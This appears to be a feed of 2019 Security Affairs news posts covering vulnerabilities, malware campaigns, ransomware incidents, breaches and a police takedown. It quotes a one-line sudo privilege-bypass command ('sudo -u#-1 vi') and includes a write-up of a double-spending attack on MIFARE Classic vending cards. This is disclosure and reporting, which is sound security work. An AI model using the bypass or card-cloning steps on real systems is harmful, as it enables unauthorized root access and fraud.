“A vulnerability in the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality in Cisco Aironet Access Points (APs) could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition.” states the Cisco advisory. “The vulnerability is due to insufficient validation of Generic Routing Encapsulation (GRE) frames that pass through the data plane of an affected AP. An attacker could exploit this vulnerability by associating to a vulnerable AP, initiating a PPTP VPN connection to an arbitrary PPTP VPN server, and sending a malicious GRE frame through the data plane of the AP. A successful exploit could allow the attacker to cause an internal process of the targeted AP to crash, which in turn would cause the AP to reload. The AP reload would cause a DoS condition for clients that are associated with the AP.

The second flaw, tracked as CVE-2019-15264, while the other resides in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol.

“A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation of Cisco Aironet and Catalyst 9100 Access Points (APs) could allow an unauthenticated, adjacent attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.” reads the security advisory published by Cisco.

“The vulnerability is due to improper resource management during CAPWAP message processing. An attacker could exploit this vulnerability by sending a high volume of legitimate wireless management frames within a short time to an affected device. A successful exploit could allow the attacker to cause a device to restart unexpectedly, resulting in a DoS condition for clients associated with the AP.”

Pierluigi Paganini

(SecurityAffairs – Cisco Aironet APs, zero-day)

The post Critical and high-severity flaws addressed in Cisco Aironet APs appeared first on Security Affairs.

International operation dismantled largest Dark Web Child abuse site

The United States Department of Justice announced the arrest of hundreds of criminals as part of a global operation against a dark web child abuse community.

The US Department of Justice announced the arrest of hundreds of criminals as part of a global operation conducted against the crime community operating the largest dark web child porn site, ‘Welcome to Video’.

The operation involved law enforcement agencies from several countries, including the IRS-CI, the US Homeland Security Investigations, the NCA, the Korean National Police of the Republic of Korea, and German Federal Criminal Police (the Bundeskriminalamt), 

Officials have arrested the administrator of the site, Jong Woo Son of South Korea (23), along with 337 suspects in 38 countries that have been charged for allegedly being users of the site.

Two former federal law enforcement officials were allegedly involved in the child porn site, Paul Casey Whipple and Richard Nikolai Gratkowski.

The US authorities issued a warrant for Son’s arrest on February 2018, and South Korean police arrested the man on March 5, 2018, and seized the server used to operate Welcome To Video.

According to the indictment, the ‘Welcome to Video’ child abuse site was launched in June 2015 and operated until March 2018. The site received at least 420 BTC in three years through at least 7300 transactions.

Experts from the National Center for Missing and Exploited Children (NCMEC) are currently analyzing over 250,000 unique videos hosted on the website, 45 percent of them contain new images that have not been previously known to exist.

“According to the indictment, on March 5, 2018, agents from the IRS-CI, HSI, National Crime Agency in the United Kingdom, and Korean National Police in South Korea arrested Son and seized the server that he used to operate a Darknet market that exclusively advertised child sexual exploitation videos available for download by members of the site.” reads a press release published by the DoJ.  “The operation resulted in the seizure of approximately eight terabytes of child sexual exploitation videos, which is one of the largest seizures of its kind.”

The great news is that the operation allowed to rescue tens of children living in the United States, Spain, and the United Kingdom.

According to the indictment, the law enforcement experts discovered the Child abuse website was hosted on the IP address 121.185.153.64 and 121.185.153.45 that was registered by a provider in South Korea and were registered with an account serviced at the defiant’s home.

Experts also identified more than one million unique bitcoin addresses that were used to receive payments from the users of the website. Two users of the Darknet market committed suicide subsequent to the execution of search warrants.

“Welcome To Video offered these videos for sale using the cryptocurrency bitcoin.  Typically, sites of this kind give users a forum to trade in these depictions.  This Darknet website is among the first of its kind to monetize child exploitation videos using bitcoin.  In fact, the site itself boasted over one million downloads of child exploitation videos by users.  Each user received a unique bitcoin address when the user created an account on the website.” continues the press release. “An analysis of the server revealed that the website had more than one million bitcoin addresses, signifying that the website had capacity for at least one million users.”

Though Son is currently serving an 18-month sentence in South Korea, a federal grand jury in Washington DC unsealed a 9-count indictment against him just yesterday, with the U.S. authorities seeking his extradition to face justice.

Darknet sites that profit from the sexual exploitation of children are among the most vile and reprehensible forms of criminal behavior,” said Assistant Attorney General Brian A. Benczkowski of the Justice Department’s Criminal Division. “This Administration will not allow child predators to use lawless online spaces as a shield. Today’s announcement demonstrates that the Department of Justice remains firmly committed to working closely with our partners in South Korea and around the world to rescue child victims and bring to justice the perpetrators of these abhorrent crimes.”

Pierluigi Paganini

(SecurityAffairs – Child abuse, cybercrime)

The post International operation dismantled largest Dark Web Child abuse site appeared first on Security Affairs.

Graboid the first-ever Cryptojacking worm that targets Docker Hub

Security experts at Palo Alto Networks discovered a worm dubbed Graboid that spreads using Docker containers.

Palo Alto Networks researchers discovered a new Monero miner with wormable capabilities, dubbed Graboid, that spreads using Docker containers.

Experts discovered that to target new systems, the Graboid worm periodically queries the C&C for vulnerable hosts, in this way the malicious code is instructed about the next target to infect.

“Unit 42 researchers identified a new cryptojacking worm we’ve named Graboid that’s spread to more than 2,000 unsecured Docker hosts. We derived the name by paying homage to the 1990’s movie “Tremors,” since this worm behaves similarly to the sandworms in the movie, in that it moves in short bursts of speed, but overall is relatively inept.” reads the analysis published by the experts.

Graboid is the first-ever Cryptojacking worm found in images on Docker Hub, the analysis conducted by the experts shows that, on average, each miner is active 63% of the time, with the mining periods being of 250 seconds.

Palo Alto Networks found over 2,000 Docker engines unsecured online, this means that threat actors could to take full control of them and abuse their resources for malicious purposes.

The hackers first compromise an unsecured Docker daemon, then they ran the malicious container from Docker Hub, it fetches scripts and a list of vulnerable hosts from the C&C, and spread targeting the host in the list.

‘Graboid’ implements both worm-spreading and cryptojacking capabilities inside containers. The experts noticed that the malware randomly selects three targets at each iteration. It installs the worm on the first target, stops the miner on the second target, and starts the miner on the third target, leading to a very random mining behavior.

“Essentially, the miner on every infected host is randomly controlled by all other infected hosts. The motivation for this randomized design is unclear. It can be a bad design, an evasion technique (not very effective), a self-sustaining system or some other purposes.” continues the analysis.

Experts reported that the malicious Docker image (pocosow/centos) has been downloaded more than 10,000 times from Docker Hub, while the gakeaws/nginx image has been downloaded over 6,500 times.

“While this cryptojacking worm doesn’t involve sophisticated tactics, techniques, or procedures, the worm can periodically pull new scripts from the C2s, so it can easily repurpose itself to ransomware or any malware to fully compromise the hosts down the line and shouldn’t be ignored.” concludes the analysis. “If a more potent worm is ever created to take a similar infiltration approach, it could cause much greater damage, so it’s imperative for organizations to safeguard their Docker hosts.”

Pierluigi Paganini

(SecurityAffairs – Graboid, hacking)

The post Graboid the first-ever Cryptojacking worm that targets Docker Hub appeared first on Security Affairs.

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, the largest France private multimedia group, was the victim of ransomware over the weekend.

The systems at the M6 Group, France’s largest private multimedia group, were infected with the ransomware over the weekend, fortunately, none of the company’s TV and radio channels interrupted the broadcasts.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “all the office and management tools are in disruption.” 

The company revealed the incident took place on Saturday.

The cybersecurity staff at the M6 Group was able to immediately mitigate the threat preventing any downtime its TV channels, radio stations, and film studios.

“The M6 ​​Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cyber security experts has helped to ensure the continued security of the Internet. good broadcasting of the programs on all our TV and radio antennas “.  reads the message posted through the Twitter account of the group.

In April, another broadcast suffered a similar incident, a cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, the TV5Monde was hit by a severe cyber attack that compromised broadcasting of transmissions across its medium. The attackers also hijacked the Channel TV5Monde website and social media accounts of the French broadcaster.

Yves Bigot, at the time the director-general of TV5Monde told the BBC that the cyber-attack came close to destroying the network of the French TV and investigation suggested Russia-linked APT28 group.

Pierluigi Paganini

(SecurityAffairs – M6 Group, ransomware)

The post M6 Group, largest France private multimedia group, hit by ransomware attack appeared first on Security Affairs.

Signature update for Symantec Endpoint protection crashed many device

Symantec rolled out an intrusion prevention signature update for its Endpoint Protection product that has caused many devices to crash and display a so-called blue screen of death (BSOD).

An intrusion prevention signature update for the Endpoint Protection product had a bad impact on the devices, in many cases it caused the devices to crash and display the blue screen of death (BSOD).

Several users reported problems through the company’s support forums and other sites online.

Customers complained about problems with Windows 7, 8 and 10.

Symantec Endpoint Protection

Symantec has acknowledged the problem with the update to its Endpoint Protection Client explaining that it causes a Windows kernel exception.

The company released the version 2019/10/14 r62 to address the issue caused by the 2019/10/14 r61 update.

“After running LiveUpdate on Symantec Endpoint Protection (SEP), the computer crashes indicating IDSvix86.sys/IDSvia64.sys as the cause of the exception.” reads the security advisory published by the researchers.

Symantec recommends to download the new signature version for the Endpoint Protection or roll back to an earlier stable version.

“Please run LiveUpdate to download latest Intrusion Prevention signature 2019/10/14 r62, or rollback to an earlier known good content revision to prevent the BSOD situation. Please check How to Backdate Virus Definitions in Endpoint Protection Manager for more details on how to roll back definitions.” continues Symantec.

Customers who cannot run LiveUpdate to apply the signatures on their systems can use the following workaround:

  1. Boot in Safe Mode and perform the following for x64 or x86 installations of SEP,
  2. Run sc config idsvia64 start= disabled or sc config idsviax86 start=disabled from cmd,
  3. Reboot in normal mode,
  4. Update the IPSdefs,
  5. Run sc config idsvia64 start= system or sc config idsviax86 start=system from cmd
  6. Reboot.

Pierluigi Paganini

(SecurityAffairs – Symantec, BSOD)

The post Signature update for Symantec Endpoint protection crashed many device appeared first on Security Affairs.

Approaching the Reverse Engineering of a RFID/NFC Vending Machine

Security expert Pasquale Fiorillo demonstrates how to hack n RFID/NFC Vending Machine.

The affected vendor did not answer to my responsible disclosure request, so I’m here to disclose this “hack” without revealing the name of the vendor itself.

The target vending machine uses an insecure NFC Card, MIFARE Classic 1k, that has been affected by multiple vulnerabilities so should not be used in important application.
Furthermore, the user’s credit was stored on the card enabling different attack scenarios, from double spending to potential data tamper storing an arbitrary credit.

Useful notes from MIFARE Classic 1K datasheet:

EEPROM: 1 kB is organized in 16 sectors of 4 blocks. One block contains 16 bytes.
The last block of each sector is called “trailer”, which contains two secret keys and programmable access conditions for each block in this sector.

  • Manufacturer block: This is the first data block (block 0) of the first sector (sector 0). It contains the IC manufacturer data. This block is read-only.
  • Data blocks: All sectors contain 3 blocks of 16 bytes for storing data (Sector 0 contains only two data blocks and the read-only manufacturer block).
    The data blocks can be configured by the access conditions bits as:
    • Read/Write blocks: fully arbitrary data, in arbitrary format
    • Value blocks: fixed data format which permits native error detection and correction and a backup management.
      A value block can only be generated through a write operation in value block format:
      • Value: Signifies a signed 4-byte value. The lowest significant byte of a value is stored in the lowest address byte. Negative values are stored in standard 2´s complement format. For reasons of data integrity and security, a value is stored three times, twice non-inverted and once inverted.
      • Adr: Signifies a 1-byte address, which can be used to save the storage address of a block, when implementing a powerful backup management. The address byte is stored four times, twice inverted and non-inverted.
Value block example for value 0x0012D687

Let’s start hacking:

In this post I did not show you how to crack the MIFARE Classic Keys needed to read/write the card, ’cause someone else has already disclosed it some time ago, so google is your friend.
At last, please, use this post to skill yourself about the fascinating world of reverse engineering, and not for stealing stuffs.

In order to start the analysis I need some dump to compare.
The requirements of this task are nfc-mfclassic tool included in libnfc, a NFC hardware interface like ACR122U, and a binary compare (aka binarydiff) tool like dhex.

Dumps:

  • Dump 0: Virgin card (not included in the screenshot below ’cause all data bytes were 0x00, except for the sector 0 that has UID and manufacturer information. These sector is read only, so these bytes are the same across dumps)
  • Dump 1: Card charged with single 0.10€ coin (Note that vending machine displays the balance with 3 decimals, 0.100€)
  • Dump 2: 0.00€ after spending the entire balance with 4 transactions of 0.025€ each
  • Dump 3: 0.10€ recharged with one single coin
Dump 1 compared to Dump 2, yellow bytes differ
Dump 2 compared Dump 3, yellow bytes differ

Blurred bytes are the MIFARE keys A and B, except for the 32 bytes at 0xE0 offset of which I don’t know their purpose.
The 4 bytes between the keys are Access Condition and denotes which key must be used for read and write operation (A or B key) and the block type (“read/write block” or “value block”).

The tool mfdread is useful to decode the Access Condition bytes rapidly, and, in general, to display MIFARE Classic data divided by sectors and blocks:

Dump 1 with mfdread parser

Early analysis:

Note: from now on I will refer to the offsets with a [square parenthesis] and a value with no parenthesis.

  • Blocks 8, 9, 10, 12 and 13 can be used also as “value block”
  • Except for bytes between offsets [0x80] and [0x9F], only few bytes differ between dumps
  • Some data are redundant, for example [0x60 … 0x63] has the same values of [0xA0 … 0xA3]
  • Values at [0xC0], [0xD0], [0xC8], [0xD8] differ by 4 between 1st and 2nd dump (eg: 0xFE – 0xFA = 0x4) and differ by 1 between 2nd dump and 3rd dump (eg: 0xFA – 0xF9 = 0x1)
  • Values at [0xC4], [0xD4] differ by 4 between 1st and 2nd dump (eg: 0x05 – 0x01 = 0x4) and differ by 1 between 2nd and 3rd dump (eg: 0x06 – 0x05 = 0x1)
    • 4 is the number of spent transaction made the first time, and 1 is the number of recharge transaction made the second time
  • Sum between yellow squared and red squared offsets has 0xFF value. In other words red squared is inverse (XOR with 0xFF) of yellow squared. For example:
    • 0xFE ⊕ 0xFF = 0x01
    • 0xFF ⊕ 0xFF = 0x00
    • 0x7F ⊕ 0xFF = 0x80
  • Values at [0x60 … 0x63] are a UNIX TIMESTAMP in little endian notation:
    • Dump 1: 0x4F9E2C27 -> 0x272C9E4F = 657235535 = 10/29/1990 @ 9:25pm
    • Dump 2: 0x71B62C27 -> 0x272CB671 = 657241713 = 10/29/1990 @ 11:08pm
    • Dump 3: 0x18592D27 -> 0x272D5918 = 657283352 = 10/30/1990 @ 10:42am
      • Ok, we are not in the 90ies, but the time difference between transactions is correct, maybe the vending machine doesn’t have an UPS 🙂

Early findings:

  • Timestamp of the last transaction was stored as 32 bit integer at MIFARE block 6 and redundant at at MIFARE block 10
  • Only MIFARE blocks 12 and 13 has “Value block” format, and they are used to store the counter of remain transaction in 32 bit format.
    This counter starts from 0x7FFFFFFF (2.147.483.647) and is decreased at each transaction
  • Blocks 1, 4, and 14 contains some data that are fixed between dumps
  • Blocks 8 and 9 changes entirely at each transaction

The credit:

If there is credit stored on the card, it was encoded at blocks 8 and 9, and the number of bytes involved between small credit difference (for example between 0.00€ and 0.10€) could indicate that some cryptographic function is involved.

At this time, a double spending attack could confirm if the credit is really stored on the card.
So, after spending all the credit, I have rewritten a previous dump on the card and I went to test it at the vending machine. The card was fully functional with the previous credit stored in that dump. Now, I’m certain that the credit is encoded (and probably encrypted) in the blocks 8 and 9.

Conclusion:

Even if the encoding format of the credit is still unknown, a double spending attack was possible.

This means that the vendor’s effort to obfuscate the credit is nullified 🙁

Adding some unique token on the card that are invalidated into back-end after each transaction, means that this token needs to be shared between all the vending machines of the vendor, but, if we add internet connection to the vending machine, there is no longer reason to store the credit on the card.

So, after all, the only remediation action that makes sense is: DO NOT STORE THE CREDIT ON THE CARD! And, more generally: DO NOT TRUST THE CLIENT!

Road to arbitrary credit:

Spending 1€ infinite times isn’t the scope of that hack. The only real scope is FUN!
To continue this analysis I need to collect a large number of dumps to advance some hypothesis so, when I have other material I will make another post.

An example of easier card:

Some vendor has more easier approach by using the MIFARE “Value block” to store the credit without obfuscation or encryption.

Credit stored on the MIFARE Value Block

The above screenshot made with “MIFARE Classic Tool” on Android smartphone, represents a Value Block used to store the credit:

0x00000CE4 = 3300 is the value in Euro thousandths (3.30€).

This particular vendor do not use key A and the Key B is a default key 0xFFFFFFFFFFFFFFFF, so the attacker doesn’t need to crack anything.

Reverse engineering and cracking of a Vending Machine is always funny.

The original post was published here

About the author: Pasquale Fiorillo

I’m a Security Auditor of ISGroup and an independent Security Researcher. As Security Auditor, my job is to perform security activities like Penetration Test and Vulnerability Assessment on networks and web applications in order to identify security issues that may be exploited by an attacker to perform malicious actions on your assets.

When I was a teenager I have co-founded an underground e-zine called Italian Hard Phreaking with some friends on IRC, writing lots of papers related to hack and reverse engineering stuffs in the telecommunication world. Later, I’ve started a new adventure as a Security Researcher, discovering vulnerabilities in a commonly used software, web applications, and web sites, in collaboration with other fabulous people of U.S.H.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post Approaching the Reverse Engineering of a RFID/NFC Vending Machine appeared first on Security Affairs.

Chinese-speaking cybercrime gang Rocke changes tactics

Chinese-speaking cybercrime gang Rocke that carried out several large-scale cryptomining campaigns, has now using news tactics to evade detection.

Chinese-speaking cybercrime gang Rocke, that carried out several large-scale cryptomining campaigns in past, has now using news tactics to evade detection. The group has been observed using new tactics, techniques, and procedures (TTPs), it is also using updated malware to evade detection.

The cybercrime organization was first spotted in April 2018 by researchers at Cisco Talos, earlier 2019 researchers from Palo Alto Networks Unit42 found new malware samples used by the Rocke group for cryptojacking that uninstalls from Linux servers cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.

In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have changed Command and Control (C2) infrastructure using a self-hosted solution.

The malicious code is used by the hackers to deliver a Moner (XMR) crypto miner that is not detected by almost any antivirus solution.

The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.

“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomaly. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails. In addition to the C2 change, functionality was also added to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088.”

The use of self-hosted and DNS records makes it hard to detect the group’s operations and takedowns. The new LSD sample was first spotted on September 17 as reported in the following graph.

The group also improved its LSD dropper by adding the malicious code to exploit CVE-2016-3088 in ActiveMQ servers.

In order to ensure that only its miner is running on the infected machine, the group attempt to kill any other processes with high CPU usage. The LSD malware analyzed the MD5 hash of the files to avoid killing its instance running on the system.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.

“It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future.”

Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.

Pierluigi Paganini

(SecurityAffairs – Rocke cybercrime gang, miner)

The post Chinese-speaking cybercrime gang Rocke changes tactics appeared first on Security Affairs.

Adobe out-of-band security updates address 82 flaws in 3 products

Adobe has released out-of-band security updates to address a total of 82 security vulnerabilities that affect three products of the company.

On Tuesday, Adobe released out-of-band security updates to address 82 flaws in Acrobat and Reader, Experience Manager, Experience Manager Forms, and Download Manager.

Out of 82 security flaws, 45 vulnerabilities affecting Adobe Acrobat and Reader have been rated critical. The exploitation of the flaws could lead to arbitrary code execution in the context of the current user.

The company also addressed 23 important-rated out-of-bounds read and cross-site scripting issues that could lead to information disclosure.

26 vulnerabilities in Adobe Acrobat and Reader reside due to use-after-free, 6 due to out-of-bounds write, 4 are type confusion bugs, 4 are untrusted pointer dereference, 3 are heap overflow bugs, one a buffer overrun and one a race condition flaw.

A majority of critical-rated vulnerabilities (i.e., 26) in Adobe Acrobat and Reader reside due to use-after-free, 6 due to out-of-bounds write, 4 are type confusion bugs, 4 due to untrusted pointer dereference, 3 are heap overflow bugs, one buffer overrun and one race condition issue.

Adobe fixed a privilege escalation flaw in Download Manager for Windows that is caused by insecure file permissions.

Adobe also addressed a dozen flaws in the Experience Manager marketing solution. An attacker could exploit the vulnerabilities to gain unauthorized access to an organization’s Experience Manager environment.

The company also fixed a XSS flaw in the Experience Manager Forms that lead to the disclosure of sensitive information.

The good news is that Adobe is not aware of any attacks exploiting the vulnerabilities in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, security updates)

The post Adobe out-of-band security updates address 82 flaws in 3 products appeared first on Security Affairs.

Click2Mail suffered a data breach that potentially impacts 200,000 registrants

Click2Mail.com, a US Postal Service affiliate partner, has suffered a data breach that exposed the personal information of its users.

The US Postal Service affiliate partner Click2Mail has suffered a data breach that exposed the personal information of its users.

The company allows its users to professionally print letters, flyers or postcards and deliver them in a business day at low prices.

It also allows users to manage mailing lists conveniently through the web browser. The company is sending out data breach notices to its impacted users.

The incident was first reported first by DataBreaches.net which was contacted by a former customer of Click2Mail who reported their suspicion that Click2Mail may have been hacked. The security breach was discovered on October 4, 2019.

Exposed users’ data include name, organization name, account mailing address, email address, and phone number. The company pointed out that it doesn’t store users’ financial data.

“We have learned that your personal information, including name, organization name, account mailing address, email address, and phone number may have been compromised.” reads the data breach notice sent to the users. “On October 4th, 2019 it was discovered that registered Click2Mail users’ names and email addresses were being used by unknown parties to send multiple spam emails. Technical analysis of our systems detected an intrusion point that was closed that same day.”

Click2Mail logo

The company hired a cyber-security firm to help its staff in investigating the incident.

Lee Garvey, President and CEO of Click2Mail confirmed that the company is going to notify the incident to its 200,000 Click2Mail.com registrants.

“In a follow-up communication, Lee Garvey, President and CEO of Click2Mail, informs this site that slightly more than 200,000 Click2Mail.com registrants will be receiving notifications, which will be sent out in segments, not all at once.” states a post published on databreaches.net. “Garvey also explained that prior to receiving this site’s email inquiry, they had received an email from a helpful customer who had used a tagged email address and was getting spam.  From the description, it sounds like the same former customer who contacted this site to alert us to their suspicions that Click2Mail had been hacked.”

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Click2Mail suffered a data breach that potentially impacts 200,000 registrants appeared first on Security Affairs.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

The Pitney Bowes company announced that a ransomware attack infected its systems and cause a partial system outage that made some of its service unavailable for some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

“At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” 

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even is its customers will not be able to refill their postage meter until the systems are restored, that can will be able to print postage if they have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, impacted solutions include Fulfillment, Delivery and Returns clients and Presort services were impacted.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

sudo flaw allows any users to run commands as Root on Linux

Experts discovered a security policy bypass issue in the Sudo utility that is installed as a command on almost every Linux and Unix system.

The Sudo utility that is installed as a command on almost every Linux and Unix system is affected by a security policy bypass issue tracked as CVE-2019-14287.

The vulnerability could be exploited by an ill-intentioned user or a malicious program to execute arbitrary commands as root on a targeted Linux system, even if the “sudoers configuration” disallows the root access.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

“When sudo is configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, it is possible to run commands as root by specifying the user ID -1 or 4294967295.” reads the security advisory.

“This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.

Log entries for commands run this way will list the target user as 4294967295 instead of root. In addition, PAM session modules will not be run for the command.”

Unlike the su command, users must, by default, supply their password for authentication, rather than the password of the target user. Once authenticated, and if the configuration file (/etc/sudoers) permits the user access, the system will invoke the requested command. 

Administrators can configure a sudoers file to define which users are allowed to run a list of commands as to specific users.

Now, due to the CVE-2019-14287 flaw, even is a user is not allowed to run a specific command as root it is possible to bypass the restriction

An attacker could exploit the vulnerability to run commands as root just by specifying the user ID “-1” or “4294967295.” This is possible because the function that converts user id into its username incorrectly handles the ‘-1’ value, or its unsigned equivalent 4294967295, and interprets it as 0, which is always associated with user ID of root user.

“Fixed CVE-2019-14287, a bug where a sudo user may be able to + run a command as root when the Runas specification explicitly + disallows root access as long as the ALL keyword is listed first.” states the advisory.

So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and completely take over the system.

“Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL in the Runas specifier.” continues the advisory.

“Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run.”

“Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run.

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. For example, given the following sudoers entry:”

    myhost bob = (ALL, !root) /usr/bin/vi

User bob is allowed to run vi as any user but root. However, due to the bug, bob is actually able to run vi as root by running sudo -u#-1 vi, violating the security policy.”

The CVE-2019-14287 vulnerability was discovered by Joe Vennix of Apple Information Security, it affects Sudo versions prior to 1.8.28.

Linux users urge to update sudo package to the latest version as soon as it is available.

Pierluigi Paganini

(SecurityAffairs – Linux, Sudo)

The post sudo flaw allows any users to run commands as Root on Linux appeared first on Security Affairs.

Winnti Group was planning a devastating supply-chain attack against Asian manufacturer

Winnti Group is back with a new modular Win backdoor that was used to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Security experts at ESET revealed that Winnti Group continues to update its arsenal, they observed that the China-linked APT group using a new modular Windows backdoor that they used to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Researchers also discovered that the APT group used an updated version of its ShadowPad malware. The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad.

Experts analyzed recent supply chain attacks against the gaming industry in Asia and noticed the use of a unique packer in a backdoor dubbed PortReuse.

“After analyzing the custom packer used by the Winnti Group, we started hunting for more executable files with this packer, in the hope of unearthing other compromised software used in supply-chain attacks. What we’ve found is not exactly what we were looking for to begin with. Instead of finding compromised software, we discovered a new listening-mode modular backdoor that uses the same packer. We believe its author call it PortReuse.” reads the paper published by ESET. “This is not a random name: this backdoor injects into a running process already listening on a TCP port, “reusing” an already open port. It hooks the receiving function and waits for a “magic” packet to trigger the malicious behavior. The legitimate traffic is forwarded to the real application, so it is effectively not blocking any legitimate activity on the compromised server. This type of backdoor is sometimes called a passive network implant “

In the attack against a video game developer, the malware was being distributed via a game’s official update server.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

The backdoor malware is being served in the following ways:

  • Embedded in a .NET application launching the initial Winnti packer;
  • In a VB script that and invokes a .NET object that launches the;
  • In an executable that has the directly at the entry point;

PortReuse doesn’t need for command and control (C2) servers, instead, it leverages the NetAgent listening on open sockets. The attacker only needs to connect directly to the compromised host.

“The PortReuse backdoor does not use a C&C server; it waits for an incoming connection that sends a “magic” packet. To do so, it doesn’t open an additional TCP port; it injects into an existing process to “reuse” a port that is already open. To be able to parse incoming data to search for the magic packet, two techniques are used: hooking of the receiving function (WSARecv or even the lower level NtDeviceIoControlFile) or registering a handler for a specific URL resource on an IIS server using HttpAddUrl with a URLPrefix.” continues the analysis.

ESET was able to identify one company that was hit by a variant of the PortReuse backdoor that injects itself within Microsoft IIS using a “GET request and inspecting the Server and Content-Length headers.” Using the Censys search engine the experts discovered eight infected machines belonging to the same organization having indicators of compromise that were matching the PortReuse infection.

The organizations is major mobile hardware and software manufacturer based in Asia, experts contacted it to alert the company of the infection.

“It is possible that the Winnti Group was planning a devastating supply-chain attack by compromising this organization,” conlcudes the analysis.

“The Winnti Group is still very active in 2019 and continues to target both gaming and other industries. The update to the ShadowPad malware shows they are still developing and using it. The relatively new PortReuse malware also shows they update their arsenal and give themselves an additional way to compromise their victims for a long period of time.”

Pierluigi Paganini

(SecurityAffairs – Winnti, malware)

The post Winnti Group was planning a devastating supply-chain attack against Asian manufacturer appeared first on Security Affairs.

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple, most of its users likely ignore that the company is sharing iOS web browsing data on some of them to Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying, starting from at least iOS 12.2, Apple has integrated the “Tencent Safe Browsing” to improve security of its users and protect them from fraudulent websites. The Tencent Safe Browsing does it by implementing the “Fraudulent Website Warning” feature in the Safari web browser for both iOS and macOS that checks every site visited by the users.

Apple secure browsing

The service leverages a blacklist of malicious websites that are continuously updated. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to know the websites he visits and also log their IP address to manage the browsing history. At the time, it’s not clear if Tencent is also collecting IP addresses from users residing outside of China, likely the Tencent’s blacklist is only provided to Chinese users because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

